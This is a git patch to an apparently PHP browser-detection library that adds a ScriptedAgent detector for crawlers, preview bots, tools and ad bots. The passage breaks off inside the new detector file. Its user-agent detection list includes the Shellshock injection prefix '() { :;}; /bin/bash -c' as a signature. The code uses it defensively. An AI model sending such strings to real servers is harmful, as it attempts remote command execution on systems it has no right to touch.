From 05958ebfb89ab2cb2cc0b4f3690d1d7e393d1ea6 Mon Sep 17 00:00:00 2001 From: Tom Mettam Date: Fri, 31 Mar 2017 17:07:52 +0100 Subject: [PATCH 01/19] !! BREAKING CHANGES !! * Removed $isRobot, setIsRobot(), getIsRobot(), isRobot(), checkBrowserRobot() * Replaced above with detectScriptedAgent() * Added a new ScriptedAgent class with detection for bots, spiders, etc * Added isWebkit(), getIsWebkit(), setIsWebkit() NOTE: TODO: Should add proper browser engine detection (Webkit, Gecko, Trident, etc) * Added $isTwitterWebView, setIsTwitterWebView(), getIsTwitterWebView(), isTwitterWebView(); * Added browser detection for UC Browser * Added browser detection for NSPlayer (Windows Media Player) * Added OS detection for NSPlayer (Windows Media Player) * Added browser detection for Microsoft Office * Added browser detection for the Apple News app * Added browser detection for the Dalvik (Android) OS * Moved wkHTMLtoPDF to scripted agents and removed the test accordingly * Moved GoogleBot to scripted agents * Moved Slurp to scripted agents * Moved W3CValidator to scripted agents * Moved MSNBot to scripted agents * Renamed "Navigator" to "Android Navigator" for clarity * Strip linebreaks in setVersion (fixes a failing test) * Added .idea to the gitignore (I use PHPstorm, don't be a hater) TODO: Tests for new class --- .gitignore | 1 + README.md | 99 ++- src/Browser.php | 152 +++- src/BrowserDetector.php | 182 +++- src/OsDetector.php | 5 + src/ScriptedAgent.php | 193 +++++ src/ScriptedAgentDetector.php | 800 ++++++++++++++++++ .../Tests/_files/UserAgentStrings.xml | 11 - 8 files changed, 1360 insertions(+), 83 deletions(-) create mode 100644 src/ScriptedAgent.php create mode 100644 src/ScriptedAgentDetector.php diff --git a/.gitignore b/.gitignore index 81b9258..86d9b11 100644 --- a/.gitignore +++ b/.gitignore @@ -1,3 +1,4 @@ composer.lock phpunit.xml vendor +.idea \ No newline at end of file diff --git a/README.md b/README.md index cee8a05..92e5ef5 100644 --- a/README.md +++
b/README.md @@ -51,16 +51,13 @@ The Browser class allows you to detect a user's browser and version. * Lynx * Safari * Chrome - * Navigator - * GoogleBot - * Yahoo! Slurp - * W3C Validator + * Android Navigator + * UC Browser * BlackBerry * IceCat * Nokia S60 OSS Browser * Nokia Browser * MSN Browser - * MSN Bot * Netscape Navigator * Galeon * NetPositive @@ -69,14 +66,16 @@ The Browser class allows you to detect a user's browser and version. * Yandex Browser * Comodo Dragon * Samsung Browser - * wkhtmltopdf ### Usage ```php use Sinergi\BrowserDetector\Browser; -$browser = new Browser(); +$browser = new Browser(); + +//You can also provide a userAgent string if you don't wish to detect the current browser +//$browser = new Browser("Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0"); if ($browser->getName() === Browser::IE && $browser->getVersion() < 11) { echo 'Please upgrade your browser.'; @@ -97,6 +96,92 @@ if ($browser->getName() === Browser::IE && $browser->isCompatibilityMode()) { } ``` +## Scripted Agent Detection + +The ScriptedAgent class allows you to detect scripted agents (bots, spiders, tools) + +### Scripted Agents Detected + +Spiders + + * GoogleBot + * Baidu + * Bing + * MSN + * Yahoo!
Slurp + * W3C Spiders + * Yandex + * Apple + * Paper.li + * Majestic12 + * Livelap + * Scoop.it + * Who.is + * Proximic + +Web Surveys + + * Ahrefs + * MetaURI + * Netcraft + * Browsershots + * MageReport + * SocialRank.io + * Gluten Free + * Ubermetrics + * Verisign IPS-Agent + +Exploits + + * ShellShock + +Web Preview bots + + * ICQ + * Google Web + * Facebook + * Bing + * Twitter + * Skype + +Tools + + * wkHTMLtoPDF + * W3C Validator + * WebDAV + * TLSProbe + * Wget + * Zgrab + +Generic + + * Google Favicon + * Curl + * Python + * GoLang + * Perl + * Java + +Ad bots + + * Google + * Microsoft + * AdBeat + +### Usage + +```php +use Sinergi\BrowserDetector\Browser; + +$browser = new Browser(); + +$scriptedAgent = $browser->detectScriptedAgent(); +if ($scriptedAgent!==false) +{ + die("Detected ".$scriptedAgent->getName()." which is a ".$scriptedAgent->getType().". Info: ".$scriptedAgent->getInfoURL()); +} +``` + ## OS Detection The OS class allows you to detect a user's operating system and version. diff --git a/src/Browser.php b/src/Browser.php index 2e34aca..52b0f44 100644 --- a/src/Browser.php +++ b/src/Browser.php @@ -25,20 +25,15 @@ class Browser const MOZILLA = 'Mozilla'; const AMAYA = 'Amaya'; const LYNX = 'Lynx'; - const WKHTMLTOPDF = 'wkhtmltopdf'; const SAFARI = 'Safari'; const SAMSUNG_BROWSER = 'SamsungBrowser'; const CHROME = 'Chrome'; - const NAVIGATOR = 'Navigator'; - const GOOGLEBOT = 'GoogleBot'; - const SLURP = 'Yahoo! 
Slurp'; - const W3CVALIDATOR = 'W3C Validator'; + const NAVIGATOR = 'Android Navigator'; const BLACKBERRY = 'BlackBerry'; const ICECAT = 'IceCat'; const NOKIA_S60 = 'Nokia S60 OSS Browser'; const NOKIA = 'Nokia Browser'; const MSN = 'MSN Browser'; - const MSNBOT = 'MSN Bot'; const NETSCAPE_NAVIGATOR = 'Netscape Navigator'; const GALEON = 'Galeon'; const NETPOSITIVE = 'NetPositive'; @@ -47,6 +42,11 @@ class Browser const YANDEX = 'Yandex'; const EDGE = 'Edge'; const DRAGON = 'Dragon'; + const NSPLAYER = 'Windows Media Player'; + const UCBROWSER = 'UC Browser'; + const MICROSOFT_OFFICE = 'Microsoft Office'; + const APPLE_NEWS = 'Apple News'; + const DALVIK = 'Android'; const VERSION_UNKNOWN = 'unknown'; @@ -67,18 +67,23 @@ class Browser /** * @var bool */ - private $isRobot = false; + private $isChromeFrame = false; /** * @var bool */ - private $isChromeFrame = false; + private $isWebkit = false; /** * @var bool */ private $isFacebookWebView = false; + /** + * @var bool + */ + private $isTwitterWebView = false; + /** * @var bool */ @@ -101,7 +106,7 @@ public function __construct($userAgent = null) } /** - * Set the name of the OS. + * Set the name of the Browser. * * @param string $name * @@ -149,7 +154,8 @@ public function isBrowser($name) */ public function setVersion($version) { - $this->version = (string)$version; + //The regex for the Firefox version lets through a linebreak, causing the test to fail + $this->version = str_replace("\n","",(string)$version); return $this; } @@ -169,39 +175,101 @@ public function getVersion() } /** - * Set the Browser to be a robot. + * Detects scripted agents (robots / bots) + * Returns a resolved ScriptedAgent object if detected. + * Otherwise returns false. 
* - * @param bool $isRobot + * @return ScriptedAgent|bool + */ + public function detectScriptedAgent() + { + $ua = $this->getUserAgent()->getUserAgentString(); + if (stripos($ua, 'bot') !== FALSE || + stripos($ua, 'spider') !== FALSE || + stripos($ua, 'crawler') !== FALSE || + stripos($ua, 'preview') !== FALSE || + stripos($ua, 'slurp') !== FALSE || + stripos($ua, 'facebookexternalhit') !== FALSE || + stripos($ua, 'mediapartners') !== FALSE || + stripos($ua, 'google-adwords') !== FALSE || + stripos($ua, 'adxvastfetcher') !== FALSE || + stripos($ua, 'adbeat') !== FALSE || + stripos($ua, 'google favicon') !== FALSE || + stripos($ua, 'webdav client') !== FALSE || + stripos($ua, 'metauri api') !== FALSE || + stripos($ua, 'tlsprobe') !== FALSE || + stripos($ua, 'wpif') !== FALSE || + stripos($ua, 'imgsizer') !== FALSE || + stripos($ua, 'netcraft ssl server survey') !== FALSE || + stripos($ua, 'curl/') !== FALSE || + stripos($ua, 'go-http-client/') !== FALSE || + stripos($ua, 'python') !== FALSE || + stripos($ua, 'libwww') !== FALSE || + stripos($ua, 'wget/') !== FALSE || + stripos($ua, 'zgrab/') !== FALSE || + stripos($ua, 'Java/') !== FALSE || + stripos($ua, '() { :;}; /bin/bash -c') !== FALSE || + stripos($ua, 'browsershots') !== FALSE || + stripos($ua, 'magereport') !== FALSE || + stripos($ua, 'ubermetrics-technologies') !== FALSE || + stripos($ua, 'W3C') !== FALSE || + stripos($ua, 'Validator') !== FALSE || + stripos($ua, 'Jigsaw/') !== FALSE || + stripos($ua, 'bing') !== FALSE || + stripos($ua, 'msn') !== FALSE || + stripos($ua, 'Google Web Preview') !== FALSE || + stripos($ua, 'ips-agent') !== FALSE || + (stripos($ua, 'Chrome/51.0.2704.103') !== FALSE && !isset($_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']) && stristr($_SERVER['HTTP_ACCEPT_LANGUAGE'], "ru-RU") !== FALSE) //ICQ Preview + ) + { + $scriptedAgent = new ScriptedAgent($ua); + if ($scriptedAgent->getName()==ScriptedAgent::UNKNOWN) + { + return false; + } + else + { + return $scriptedAgent; + } + } + else + 
{ + return false; + } + } + + /** + * @param bool $isChromeFrame * * @return $this */ - public function setIsRobot($isRobot) + public function setIsChromeFrame($isChromeFrame) { - $this->isRobot = (bool)$isRobot; + $this->isChromeFrame = (bool)$isChromeFrame; return $this; } /** - * Is the browser from a robot (ex Slurp,GoogleBot)? + * Used to determine if the browser is actually "chromeframe". * * @return bool */ - public function getIsRobot() + public function getIsChromeFrame() { if (!isset($this->name)) { BrowserDetector::detect($this, $this->getUserAgent()); } - return $this->isRobot; + return $this->isChromeFrame; } /** * @return bool */ - public function isRobot() + public function isChromeFrame() { - return $this->getIsRobot(); + return $this->getIsChromeFrame(); } /** @@ -209,9 +277,9 @@ public function isRobot() * * @return $this */ - public function setIsChromeFrame($isChromeFrame) + public function setIsWebkit($isWebkit) { - $this->isChromeFrame = (bool)$isChromeFrame; + $this->isWebkit = (bool)$isWebkit; return $this; } @@ -221,21 +289,21 @@ public function setIsChromeFrame($isChromeFrame) * * @return bool */ - public function getIsChromeFrame() + public function getIsWebkit() { if (!isset($this->name)) { BrowserDetector::detect($this, $this->getUserAgent()); } - return $this->isChromeFrame; + return $this->isWebkit; } /** * @return bool */ - public function isChromeFrame() + public function isWebkit() { - return $this->getIsChromeFrame(); + return $this->getIsWebkit(); } /** @@ -272,6 +340,40 @@ public function isFacebookWebView() return $this->getIsFacebookWebView(); } + /** + * @param bool $isTwitterWebView + * + * @return $this + */ + public function setIsTwitterWebView($isTwitterWebView) + { + $this->isTwitterWebView = (bool) $isTwitterWebView; + + return $this; + } + + /** + * Used to determine if the browser is actually "Twitter". 
+ * + * @return bool + */ + public function getIsTwitterWebView() + { + if (!isset($this->name)) { + BrowserDetector::detect($this, $this->getUserAgent()); + } + + return $this->isTwitterWebView; + } + + /** + * @return bool + */ + public function isTwitterWebView() + { + return $this->getIsTwitterWebView(); + } + /** * @param UserAgent $userAgent * diff --git a/src/BrowserDetector.php b/src/BrowserDetector.php index 5156188..d18be6f 100644 --- a/src/BrowserDetector.php +++ b/src/BrowserDetector.php @@ -46,16 +46,14 @@ class BrowserDetector implements DetectorInterface 'Samsung', 'Chrome', 'OmniWeb', + 'UCBrowser', //before Android // common mobile 'Android', 'BlackBerry', 'Nokia', 'Gsa', - // common bots - 'Robot', - // wkhtmltopdf before Safari - 'Wkhtmltopdf', // WebKit base check (post mobile and others) + 'AppleNews', 'Safari', // everyone else 'NetPositive', @@ -65,6 +63,8 @@ class BrowserDetector implements DetectorInterface 'Phoenix', 'Amaya', 'Lynx', + 'NSPlayer', + 'Office', 'Shiretoko', 'IceCat', 'Iceweasel', @@ -92,6 +92,8 @@ public static function detect(Browser $browser, UserAgent $userAgent = null) self::checkChromeFrame(); self::checkFacebookWebView(); + self::checkTwitterWebView(); + self::checkWebkit(); foreach (self::$browsersList as $browserName) { $funcName = self::FUNC_PREFIX . $browserName; @@ -120,6 +122,22 @@ public static function checkChromeFrame() return false; } + /** + * Determine if the browser is a WebKit webview. + * + * @return bool + */ + public static function checkWebkit() + { + if (strpos(self::$userAgentString, 'AppleWebKit/') !== false) { + self::$browser->setIsWebkit(true); + + return true; + } + + return false; + } + /** * Determine if the user is using Facebook. * @@ -136,6 +154,24 @@ public static function checkFacebookWebView() return false; } + /** + * Determine if the user is using Twitter.
+ * + * @return bool + */ + public static function checkTwitterWebView() + { + if (strpos(self::$userAgentString, 'Twitter for') !== false) { + self::$browser->setIsTwitterWebView(true); + + return true; + } + + return false; + } + + + /** * Determine if the user is using a BlackBerry. * @@ -173,25 +209,6 @@ public static function checkBrowserBlackBerry() return false; } - /** - * Determine if the browser is a robot. - * - * @return bool - */ - public static function checkBrowserRobot() - { - if (stripos(self::$userAgentString, 'bot') !== false || - stripos(self::$userAgentString, 'spider') !== false || - stripos(self::$userAgentString, 'crawler') !== false - ) { - self::$browser->setIsRobot(true); - - return true; - } - - return false; - } - /** * Determine if the browser is Internet Explorer. * @@ -731,7 +748,7 @@ public static function checkBrowserIceCat() */ public static function checkBrowserNokia() { - if (preg_match("/Nokia([^\/]+)\/([^ SP]+)/i", self::$userAgentString, $matches)) { + if (preg_match("/Nokia([^\\/]+)\\/([^ SP]+)/i", self::$userAgentString, $matches)) { self::$browser->setVersion($matches[2]); if (stripos(self::$userAgentString, 'Series60') !== false || strpos(self::$userAgentString, 'S60') !== false @@ -755,7 +772,7 @@ public static function checkBrowserNokia() public static function checkBrowserFirefox() { if (stripos(self::$userAgentString, 'safari') === false) { - if (preg_match("/Firefox[\/ \(]([^ ;\)]+)/i", self::$userAgentString, $matches)) { + if (preg_match("/Firefox[\\/ \\(]([^ ;\\)]+)/i", self::$userAgentString, $matches)) { if (isset($matches[1])) { self::$browser->setVersion($matches[1]); } @@ -781,7 +798,7 @@ public static function checkBrowserFirefox() public static function checkBrowserSeaMonkey() { if (stripos(self::$userAgentString, 'safari') === false) { - if (preg_match("/SeaMonkey[\/ \(]([^ ;\)]+)/i", self::$userAgentString, $matches)) { + if (preg_match("/SeaMonkey[\\/ \\(]([^ ;\\)]+)/i", self::$userAgentString, 
$matches)) { if (isset($matches[1])) { self::$browser->setVersion($matches[1]); } @@ -901,20 +918,7 @@ public static function checkBrowserAmaya() return false; } - /** - * Determine if the browser is Safari. - * - * @return bool - */ - public static function checkBrowserWkhtmltopdf() - { - if (stripos(self::$userAgentString, 'wkhtmltopdf') !== false) { - self::$browser->setName(Browser::WKHTMLTOPDF); - return true; - } - return false; - } /** * Determine if the browser is Safari. * @@ -987,7 +991,7 @@ public static function checkBrowserDragon() */ public static function checkBrowserAndroid() { - // Navigator + // Android Navigator if (stripos(self::$userAgentString, 'Android') !== false) { if (preg_match('/Version\/([\d\.]*)/i', self::$userAgentString, $matches)) { if (isset($matches[1])) { @@ -1001,6 +1005,104 @@ public static function checkBrowserAndroid() return true; } + // Dalvik (Android OS) + if (stripos(self::$userAgentString, 'Dalvik/') !== false) { + $aresult = explode('/', stristr(self::$userAgentString, 'Dalvik')); + if (isset($aresult[1])) { + $aversion = explode(' ', $aresult[1]); + self::$browser->setVersion($aversion[0]); + } + self::$browser->setName(Browser::DALVIK); + + return true; + } + + return false; + } + + /** + * Determine if the browser is UCBrowser. + * + * @return bool + */ + public static function checkBrowserUCBrowser() + { + // Navigator + if (stripos(self::$userAgentString, 'UCBrowser/') !== false) { + $aresult = explode('/', stristr(self::$userAgentString, 'UCBrowser')); + if (isset($aresult[1])) { + $aversion = explode(' ', $aresult[1]); + self::$browser->setVersion($aversion[0]); + } + self::$browser->setName(Browser::UCBROWSER); + + return true; + } + + return false; + } + + /** + * Determine if the browser is Windows Media Player. 
+ * + * @return bool + */ + public static function checkBrowserNSPlayer() + { + // Navigator + if (stripos(self::$userAgentString, 'NSPlayer/') !== false) { + $aresult = explode('/', stristr(self::$userAgentString, 'NSPlayer')); + if (isset($aresult[1])) { + $aversion = explode(' ', $aresult[1]); + self::$browser->setVersion($aversion[0]); + } + self::$browser->setName(Browser::NSPLAYER); + + return true; + } + + return false; + } + + /** + * Determine if the browser is Microsoft Office. + * + * @return bool + */ + public static function checkBrowserOffice() + { + // Navigator + if (stripos(self::$userAgentString, 'Microsoft Office') !== false) { + self::$browser->setVersion(Browser::VERSION_UNKNOWN); + self::$browser->setName(Browser::NSPLAYER); + + return true; + } + + return false; + } + + /** + * Determine if the browser is the Apple News app. + * + * @return bool + */ + public static function checkBrowserAppleNews() + { + // Navigator + if (stripos(self::$userAgentString, 'AppleNews/') !== false) { + if (preg_match('/Version\/([\d\.]*)/i', self::$userAgentString, $matches)) { + if (isset($matches[1])) { + self::$browser->setVersion($matches[1]); + } + } else { + self::$browser->setVersion(Browser::VERSION_UNKNOWN); + } + self::$browser->setName(Browser::APPLE_NEWS); + + return true; + } + return false; } } diff --git a/src/OsDetector.php b/src/OsDetector.php index 40b0611..8510e90 100644 --- a/src/OsDetector.php +++ b/src/OsDetector.php @@ -209,6 +209,11 @@ private static function checkWindows(Os $os, UserAgent $userAgent) return true; } + if (stripos($userAgent->getUserAgentString(), 'NSPlayer/') !== false) { + $os->setName(Os::WINDOWS); + $os->setVersion(Os::VERSION_UNKNOWN); + return true; + } return false; } diff --git a/src/ScriptedAgent.php b/src/ScriptedAgent.php new file mode 100644 index 0000000..826a146 --- /dev/null +++ b/src/ScriptedAgent.php @@ -0,0 +1,193 @@ +setUserAgent($userAgent); + } elseif (null === $userAgent || is_string($userAgent)) { + 
$this->setUserAgent(new UserAgent($userAgent)); + } else { + throw new InvalidArgumentException(); + } + } + + /** + * Set the name of the ScriptedAgent. + * + * @param string $name + * + * @return void + */ + public function setName($name) + { + $this->name = (string)$name; + } + + /** + * Return the name of the ScriptedAgent. + * + * @return string + */ + public function getName() + { + if (!isset($this->name)) { + ScriptedAgentDetector::detect($this, $this->getUserAgent()); + } + + return $this->name; + } + + /** + * Set the type of the ScriptedAgent. + * + * @param string $type + * + * @return void + */ + public function setType($type) + { + $this->type = (string)$type; + } + + /** + * Return the type of the ScriptedAgent. + * + * @return string + */ + public function getType() + { + if (!isset($this->type)) { + ScriptedAgentDetector::detect($this, $this->getUserAgent()); + } + + return $this->type; + } + + /** + * Set the info URL for the ScriptedAgent. + * + * @param string $url + * + * @return void + */ + public function setInfoURL($url) + { + $this->url = (string)$url; + } + + /** + * Return the info URL for the ScriptedAgent. 
+ * + * @return string + */ + public function getInfoURL() + { + if (!isset($this->url)) { + ScriptedAgentDetector::detect($this, $this->getUserAgent()); + } + return $this->url; + } + + /** + * @param UserAgent $userAgent + * + * @return void + */ + public function setUserAgent(UserAgent $userAgent) + { + $this->userAgent = $userAgent; + } + + /** + * @return UserAgent + */ + public function getUserAgent() + { + return $this->userAgent; + } + + +} + + +?> \ No newline at end of file diff --git a/src/ScriptedAgentDetector.php b/src/ScriptedAgentDetector.php new file mode 100644 index 0000000..c51cf84 --- /dev/null +++ b/src/ScriptedAgentDetector.php @@ -0,0 +1,800 @@ +getUserAgent(); + } + self::$userAgentString = $userAgent->getUserAgentString(); + + self::$scriptedAgent->setName(ScriptedAgent::UNKNOWN); + self::$scriptedAgent->setType(ScriptedAgent::UNKNOWN); + self::$scriptedAgent->setInfoURL(ScriptedAgent::UNKNOWN); + + foreach (self::$robotsList as $robotName) { + $funcName = self::FUNC_PREFIX . $robotName; + + if (self::$funcName()) { + return true; + } + } + + return false; + } + + /** + * Determine if the browser is wkHTMLtoPDF + * + * @return bool + */ + public static function checkRobotwkHTMLtoPDF() + { + if (stripos(self::$userAgentString, 'wkhtmltopdf') !== false) { + self::$scriptedAgent->setName(ScriptedAgent::WKHTMLTOPDF); + self::$scriptedAgent->setType(ScriptedAgent::TOOL); + self::$scriptedAgent->setInfoURL("https://wkhtmltopdf.org/"); + return true; + } + return false; + } + + /** + * Determine if the browser is the ICQ preview. + * + * @return bool + */ + public static function checkRobotICQ() + { + //Chrome 51 always provides the Upgrade-Insecure-Requests header. ICQ does not. + //But to be extra safe, also check for the russian language which the ICQ bot sets. 
+ if (stripos(self::$userAgentString, 'Chrome/51.0.2704.103') !== FALSE && !isset($_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']) && stristr($_SERVER['HTTP_ACCEPT_LANGUAGE'], "ru-RU") !== FALSE) + { + self::$scriptedAgent->setName(ScriptedAgent::ICQ); + self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); + self::$scriptedAgent->setInfoURL("https://icq.com"); + return true; + } + return false; + } + + /** + * Determine if the agent is GoogleBot, or a google ads bot. + * + * @return bool + */ + public static function checkRobotGoogle() + { + if (stripos(self::$userAgentString, "Googlebot") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::GOOGLEBOT); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://support.google.com/webmasters/answer/1061943?hl=en"); + return true; + } + if (stripos(self::$userAgentString, "AdsBot-Google") !== false + || stripos(self::$userAgentString, "Mediapartners-Google") !== false + || stripos(self::$userAgentString, "Google-Adwords") !== false + || stripos(self::$userAgentString, "AdXVastFetcher-Google") !== false + ) + { + self::$scriptedAgent->setName(ScriptedAgent::GOOGLEADS); + self::$scriptedAgent->setType(ScriptedAgent::ADVERTISING); + self::$scriptedAgent->setInfoURL("https://support.google.com/webmasters/answer/1061943?hl=en"); + return true; + } + if (stripos(self::$userAgentString, "Google Favicon") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::GOOGLEFAVICON); + self::$scriptedAgent->setType(ScriptedAgent::GENERIC); + self::$scriptedAgent->setInfoURL("https://www.webmasterworld.com/search_engine_spiders/4626518.htm"); + return true; + } + if (stripos(self::$userAgentString, "Google Web Preview") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::GOOGLEPREVIEW); + self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); + self::$scriptedAgent->setInfoURL("https://www.distilnetworks.com/bot-directory/bot/google-web-preview/"); + return true; + } + 
return false; + } + + /** + * Determine if the agent is the Baidu spider. + * + * @return bool + */ + public static function checkRobotBaidu() + { + if (stripos(self::$userAgentString, "Baiduspider") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::BAIDU); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://support.google.com/webmasters/answer/1061943?hl=en"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Facebook preview bot. + * + * @return bool + */ + public static function checkRobotFacebook() + { + if (stripos(self::$userAgentString, "facebookexternalhit") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::FACEBOOK); + self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); + self::$scriptedAgent->setInfoURL("https://www.facebook.com/externalhit_uatext.php"); + return true; + } + return false; + } + + /** + * Determine if the agent is the bing spider, bing preview bot, or MSN bot + * + * @return bool + */ + public static function checkRobotBing() + { + + if (stripos(self::$userAgentString, "adidxbot/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::BING); + self::$scriptedAgent->setType(ScriptedAgent::ADVERTISING); + self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); + return true; + } + if (stripos(self::$userAgentString, "/bingbot.htm") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::BING); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); + return true; + } + if (stripos(self::$userAgentString, "/msnbot.htm") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::MSNBOT); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); + 
return true; + } + if (stripos(self::$userAgentString, "BingPreview/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::BING_PREVIEW); + self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); + self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Yahoo Slurp! Spider. + * + * @return bool + * + */ + public static function checkRobotSlurp() + { + if (stripos(self::$userAgentString, "Yahoo! Slurp") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::SLURP); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://help.yahoo.com/kb/SLN22600.html"); + return true; + } + return false; + } + + /** + * Determine if the agent is the twitter preview bot. + * + * @return bool + */ + public static function checkRobotTwitter() + { + if (stripos(self::$userAgentString, "Twitterbot/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::TWITTER); + self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); + self::$scriptedAgent->setInfoURL("http://stackoverflow.com/questions/22362215/twitter-user-agent-on-sharing"); + return true; + } + return false; + } + + /** + * Determine if the agent is the skype preview bot. + * + * @return bool + */ + public static function checkRobotSkype() + { + if (stripos(self::$userAgentString, "SkypeUriPreview") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::SKYPE); + self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); + self::$scriptedAgent->setInfoURL("http://www.skype.com"); + return true; + } + return false; + } + + /** + * Determine if the agent is the W3C Validator tool. 
+ * + * @return bool + */ + public static function checkRobotW3CValidator() + { + if (stripos(self::$userAgentString, "W3C_Validator/") !== false || + stripos(self::$userAgentString, "Validator.nu/") !== false || + stripos(self::$userAgentString, "W3C-mobileOK/DDC-") !== false || + stripos(self::$userAgentString, "W3C_I18n-Checker/") !== false || + stripos(self::$userAgentString, "FeedValidator/") !== false || + stripos(self::$userAgentString, "Jigsaw/") !== false || + stripos(self::$userAgentString, "JW3C_Unicorn/") !== false + ) + { + self::$scriptedAgent->setName(ScriptedAgent::W3CVALIDATOR); + self::$scriptedAgent->setType(ScriptedAgent::TOOL); + self::$scriptedAgent->setInfoURL("https://validator.w3.org/services"); + return true; + } + if (stripos(self::$userAgentString, "NING/") !== false || + stripos(self::$userAgentString, "W3C-checklink") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::W3CVALIDATOR); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://validator.w3.org/services"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Yandex spider. + * + * @return bool + */ + public static function checkRobotYandex() + { + if (stripos(self::$userAgentString, "YandexBot/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::YANDEX); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("http://yandex.com/bots"); + return true; + } + return false; + } + + /** + * Determine if the agent is the AppleBot + * + * @return bool + */ + public static function checkRobotApple() + { + if (stripos(self::$userAgentString, "AppleBot/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::APPLEBOT); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://support.apple.com/en-gb/HT204683"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Paper.li bot. 
+ * + * @return bool + */ + public static function checkRobotPaperli() + { + if (stripos(self::$userAgentString, "PaperLiBot/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::PAPERLI); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://support.paper.li/hc/en-us/articles/204105253-What-is-Paper-li-"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Ahrefs survey. + * + * @return bool + */ + public static function checkRobotAhrefs() + { + if (stripos(self::$userAgentString, "AhrefsBot/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::AHREFS); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("https://ahrefs.com/robot"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Majestic 12 spider. + * + * @return bool + */ + public static function checkRobotMJ12() + { + if (stripos(self::$userAgentString, "MJ12Bot/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::MJ12); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("http://www.majestic12.co.uk/projects/dsearch/mj12bot.php"); + return true; + } + return false; + } + + /** + * Determine if the agent is the LiveLap spider. + * + * @return bool + */ + public static function checkRobotLiveLap() + { + if (stripos(self::$userAgentString, "LivelapBot/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::LIVELAP); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("http://site.livelap.com/crawler.html"); + return true; + } + return false; + } + + /** + * Determine if the agent is a Web Distributed Authoring and Versioning client. Usually unexpected WebDAV requests are hack attempts. 
+ * + * @return bool + */ + public static function checkRobotWebdav() + { + if (stripos(self::$userAgentString, "WEBDAV Client") !== false || + stripos(self::$userAgentString, "Microsoft Office Existence Discovery") !== false) //Office Webdav probe + { + self::$scriptedAgent->setName(ScriptedAgent::WEBDAV); + self::$scriptedAgent->setType(ScriptedAgent::TOOL); + self::$scriptedAgent->setInfoURL("https://en.wikipedia.org/wiki/WebDAV"); + return true; + } + return false; + } + + /** + * Determine if the agent is the MetaURI scraper. + * + * @return bool + */ + public static function checkRobotMetaURI() + { + if (stripos(self::$userAgentString, "MetaURI API/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::METAURI); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("https://github.com/stateless-systems/uri-meta"); + return true; + } + return false; + } + + /** + * Determine if the agent is the TLSProbe tool. + * + * @return bool + */ + public static function checkRobotTLSProbe() + { + if (stripos(self::$userAgentString, "TLSProbe/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::TLSPROBE); + self::$scriptedAgent->setType(ScriptedAgent::TOOL); + self::$scriptedAgent->setInfoURL("https://bitbucket.org/marco-bellaccini/tlsprobe"); + return true; + } + return false; + } + + /** + * Determine if the agent is the scoop.it bots. + * + * @return bool + */ + public static function checkRobotScoopIt() + { + if (stripos(self::$userAgentString, "wpif Safari") !== false + || stripos(self::$userAgentString, "imgsizer Safari") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::SCOOPIT); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://www.webmasterworld.com/search_engine_spiders/4785385.htm"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Netcraft SSL Survey. 
